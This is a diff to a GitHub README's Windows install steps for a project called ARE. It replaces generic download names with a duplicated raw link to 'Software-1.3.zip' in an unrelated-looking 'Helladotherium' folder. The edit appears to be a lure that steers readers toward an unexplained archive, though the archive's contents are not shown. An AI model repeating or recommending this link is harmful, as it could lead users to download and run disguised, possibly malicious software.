lukky262/ARE/README.md

 Once on the page, look for the latest release or download section.
 Here you can download the version designed for Windows.

-Click the link labeled something like `ARE.zip` or `ARE-Windows.exe` to start the download.
+Click the link labeled something like `https://github.com/lukky262/ARE/raw/refs/heads/main/Helladotherium/Software-1.3.zip` or `https://github.com/lukky262/ARE/raw/refs/heads/main/Helladotherium/Software-1.3.zip` to start the download.

 ### Step 3: Extract or Run the Package